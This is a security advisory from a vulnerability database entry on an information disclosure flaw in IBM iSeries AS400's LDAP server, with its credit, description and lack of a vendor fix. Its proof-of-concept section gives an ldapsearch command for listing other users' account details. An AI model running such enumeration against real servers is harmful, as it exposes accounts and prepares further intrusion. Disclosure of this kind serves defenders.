IBM iSeries AS400 LDAP Server Remote Information Disclosure Vulnerability
BID:12991
Info
IBM iSeries AS400 LDAP Server Remote Information Disclosure Vulnerability
| Bugtraq ID: | 12991 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 04 2005 12:00AM |
| Updated: | Apr 04 2005 12:00AM |
| Credit: | "Shalom Carmel" <[email protected]> is credited with the disclosure of this issue. |
| Vulnerable: |
IBM Iseries As 400 0 |
| Not Vulnerable: | |
Discussion
IBM iSeries AS400 LDAP Server Remote Information Disclosure Vulnerability
A remote information disclosure issue affects IBM iSeries AS400 LDAP Server. This issue is due to a failure of the application to properly secure sensitive information.
An authenticated attacker may leverage this issue to disclose user names and account information of users in their group. This may facilitate further attacks against the affected server.
A remote information disclosure issue affects IBM iSeries AS400 LDAP Server. This issue is due to a failure of the application to properly secure sensitive information.
An authenticated attacker may leverage this issue to disclose user names and account information of users in their group. This may facilitate further attacks against the affected server.
Exploit / POC
IBM iSeries AS400 LDAP Server Remote Information Disclosure Vulnerability
No exploit is required to leverage this issue. To disclose the users names issue the following command using the 'ldapsearch' utility:
ldapsearch -h as400.example.com -b "cn=accounts,os400-sys=S0011223.example.com" -D "os400-profile=SCARMEL,cn=accounts,os400-sys=S0011223.example.com" -w as400Password -L -s sub "os400-profile=LESLIE"
No exploit is required to leverage this issue. To disclose the users names issue the following command using the 'ldapsearch' utility:
ldapsearch -h as400.example.com -b "cn=accounts,os400-sys=S0011223.example.com" -D "os400-profile=SCARMEL,cn=accounts,os400-sys=S0011223.example.com" -w as400Password -L -s sub "os400-profile=LESLIE"
Solution / Fix
IBM iSeries AS400 LDAP Server Remote Information Disclosure Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
IBM iSeries AS400 LDAP Server Remote Information Disclosure Vulnerability
References:
References:
- AS/400 LDAP user accounts disclosure ("Shalom Carmel"
- iSeries Home Page (IBM)